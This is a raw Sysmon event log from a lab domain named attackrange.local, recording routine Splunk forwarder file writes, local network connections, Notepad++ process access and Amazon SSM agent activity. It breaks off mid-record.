23542300x8000000000000000104356Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:13.719{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70EADC8134B302970B3B56279FD43160,SHA256=34800D736422CE8AE97F7EB9E7ED3270011D139CFCB3759369DC88F2C1A92A82,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104355Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:11.271{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49592-false10.0.1.12-8000- 23542300x800000000000000082198Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:14.691{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E273B986854174FFB0B217EB1B69EA31,SHA256=C0538326FF8AA0B9BAE66FBA3575A6638B3BDFFD304FD17F8183A8673EF4790B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104357Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:14.719{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4654776F195A6871AAADE3DDB74AF77D,SHA256=BF2D6C70D298434645ABE7001F2D9EB251FEBC91508144F03A6D13E7D192CE24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104358Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:15.719{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B741E6307B66C16685C29DA6D6FE957,SHA256=A4BA017809AFFD511F4BFB2A8EA7FAAC4A3184EBA38B4CE43146D5EAF4735A8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082199Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:15.753{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0315454D6694212A3BCF89612DA08F49,SHA256=8BFBA3423802A4DBC9FD9A2FAF21E173EB9F64DCCD3D4D786E1617D7C7FED015,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082200Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:16.781{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D3ECEB4CA1ADB0FB3025FC1B174F11C,SHA256=4CDFC067067DA3A54226BB482FD4F87496446F148D00CE7986CA9B44F70ADDF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104359Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:16.733{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F93A7AE2DA660DB3A0B9D7F32D08E753,SHA256=3D38EBD688EBE3B932B11C37831CA1BBA49338198D1437E1188C261238D5C96B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082201Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:17.781{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9FE7AC4EA9167AB98F35DCD184B45C9,SHA256=370810B7282BBFA354E7A79BC41639E1623009A711A34973EBE50C288CC534E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104360Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:17.733{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DF90456A84B00FAB122C4FA89F781CA,SHA256=F1DB240A456DFAEE7F5D0B733C79089128E71EFF87CB09D3C4F2509398E3674F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082202Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:18.830{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=449BF75E1DA2FCCF453557FAF7A24D22,SHA256=98179032985BD813D9715D253E197C605DEDE4B2FFD4F61AB2BFF93E20704355,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104362Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:18.733{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC999163756E5C564678E1AC77E6C45C,SHA256=74949FB6118E3582A1AB2268D0E22653859A3A0B3C172CFC3995B08E00B890E5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104361Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:16.379{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49593-false10.0.1.12-8000- 23542300x800000000000000082205Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:19.969{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7372E0CE7BCC548C8AB21A29B7FD0C4,SHA256=A24AA3CEA8721752AD16516F1144BAB33796F5CACDD23F5548DDFB6D95CBD153,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104363Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:19.733{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82341CFC94EC8A854B083302F0E60EEE,SHA256=3D426A7C7647499BC94E0525220203FC803221E72F4E4A83192E4CB5E6A00F60,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082204Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:16.631{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50082-false10.0.1.12-8000- 23542300x800000000000000082203Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:19.000{2FDD8D40-AC9A-615A-1200-00000000FD01}996NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=331F66A65A1D3AEE144CFBBA5202531D,SHA256=A9EBE628F834A44258B59A29217578C9CCFEA12B5BD8A2A0091FC1C922227180,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082206Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:20.969{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA2BAA400B22047F20B20C5567E84633,SHA256=DBB295853ED0D49B8FE1FD0880B448CC45344A7800152B6CFC84A324046618DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104364Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:20.749{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C7A78BD21A23EDFF43A4AD49A39CD53,SHA256=8A5280F66B82144C73DA4408DF549F32F27539C7A50713ECB5BDAD07514C5ABF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104365Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:21.764{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E3FCB291201D2AAC2DA94EB22E7D035,SHA256=694811F5559A440371C663BDF1831F65FED3E9D03B19AB690193836687FFED63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104367Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:22.764{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF2B172CAB6703D5F54FC1C13EFA3738,SHA256=E6D8EE1A33E050B9A32E3AA3BDB376C74A36271E69E615C39B5628ADE3FB630A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082207Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:22.031{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFDAA9703E363CCDB9DB257CDE39E673,SHA256=49AB161ACE51ED55C2CFBD0C11D33D5C4829AB3D67DADBDFC45E5416440A433A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104366Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:21.411{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49594-false10.0.1.12-8000- 23542300x8000000000000000104368Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:23.764{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76A6015B63EFE393689A9F7A693C7F07,SHA256=BD0CAC6EC967C205BA38E8B9AB7C94DCEEF989ADD1F18209C475B22CE8F02AE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082208Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:23.141{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28A1BD6C434009826B7B81E65527BFBE,SHA256=E960A151D805577D94F67F7B55CA12910F32E75A4123BD71229939197BDBD975,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104369Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:24.764{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DDFB6639033EBC1413004118650C5FF,SHA256=943DB76AE0C003635EE1A3E78DA70E39DA51256C2BF19C08EC16A3F181DA0F3B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082210Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:21.710{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50083-false10.0.1.12-8000- 23542300x800000000000000082209Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:24.188{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BF04E54EC3CBD57328DE02F4F488669,SHA256=2B4DE3135135A8BED606CCEF903DCDF96C90A4C7C8AB1123D679B524B28B857E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104373Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:25.764{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E8AEE1421CE0CF10BD7C4EB9F95D5EA,SHA256=EF48621BC76F029F18B14875ACA4985B786B1E9A859233B4A67270EA6F84F964,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082211Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:25.281{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9926B562A509E6C3AE86C23B7500CDA6,SHA256=00842BBE93150F7C4F35F741D09C350E084136B7EFA93A4D0DF5079A449A094B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104372Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:25.030{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104371Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:25.030{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104370Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:25.030{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104374Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:26.764{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EBED469C3F2B0ABF36A96E48197815F,SHA256=C8955F470ED18BD1B70614CC857C0900D711D9C7374A890BA595A4DF44D62F5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082212Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:26.297{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80FE89EC518A5DDE7F1EF98398898FB5,SHA256=B71E1B94C74A5A059BBBCADBC147F10ECCE1D432ED4400DBA6049671F455BA73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104375Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:27.764{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F014B12BEB32B64DD18C4973676C3B6,SHA256=5822E4C749879698D0EC0AF6D094007E42926DBB1271833CD9CECEC7AC666143,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082213Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:27.500{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F1121354049F08191B09606F84082C1,SHA256=093005B32B87EC465D0F6EBC3FEECAA24103CF797A4D3A82050C03DB00117BF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082214Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:28.516{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D411C2B59042B882CFDD20218FE9F08,SHA256=D6188EA3EDC2DBD15771B3D20C875BE8E146C8F24A5D7CF5E92A64A67BFDE89A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104379Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:28.779{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27DFA827D17AF53869758D386C63A25E,SHA256=2275EC44763555032ACE25C7C6F69B8D8B11C9833CD10230ACC09D61A9126856,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104378Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:28.732{58E9C193-B11C-615A-9C01-00000000FC01}5944ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\new 2@2021-10-04_075343MD5=9619F8D93851E867E37FA3EA526AB825,SHA256=DEB93FF6A2BB1A19D4E5939F30C2CEF1146CAA46CDFD2DCFF2A24A01D7B208CE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104377Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:27.301{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49595-false10.0.1.12-8000- 23542300x8000000000000000104376Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:28.393{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\respondent-20211004072647-027MD5=53085563A3ABB9F3808759992432B215,SHA256=10E8415EFF195E3F3A29733AD6341E818F88D003F4EF1749654882A61D67B63B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082217Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:29.719{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082216Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:29.703{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=652D6B33767DC3721E6D8E50325C7772,SHA256=C3E17B8C444EAD076825C87C6DEF6C762190E331F2B87567602FEB7D62887B00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104381Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:29.792{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EA0F099B214BEC97D12D7D9BB0B05BF,SHA256=6C96AF5218E5269153F957E86A930941E49CA5FFF83726C613ABF5CA3AA6CADC,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082215Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:27.664{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50084-false10.0.1.12-8000- 23542300x8000000000000000104380Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:29.405{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\surveyor-20211004072645-028MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104382Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:30.796{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF308F96D8F888691AFC556CF83329C9,SHA256=53F749F0F288FE7749A6951FEB6F4839727DCE92B0DEEA4341706EF62D194926,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082218Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:30.703{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9903C9CDE246844E95AD1BE11D4C18D6,SHA256=461A25A02B50F536426C93980777E041B316929ABA282C92C7EFF519CE75DDE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104383Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:31.812{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E261F8C3A2FC8041045E6D2ECB1D7116,SHA256=362A0A8D1E4E4DA68798E960E5D94FA50729F4C8D17B9E783695E253254CB405,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082233Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:29.257{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program 